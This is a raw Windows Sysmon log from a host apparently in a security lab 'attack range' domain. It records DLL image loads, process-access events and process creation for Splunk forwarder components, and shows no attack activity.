Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating 
SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 
734700x800000000000000098920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x800000000000000098919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives 
LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 
734700x800000000000000098906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000098898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 
734700x800000000000000098896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x800000000000000098893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:52.046{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.047{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk 
Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:53.578{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB62A2F8D174C1830B1A080814C1F476,SHA256=33B0B1D5776C0E824C3F696C5BD2F5499164E7C3CBF24A5118E1F56C3AFD4177,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:54.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71DE703122449DA4A07C38A806E400E3,SHA256=4CD1F7FC0BDC8E4C3437B5C30F84070C17FE19C87BA7074F3A6343B87DF60695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 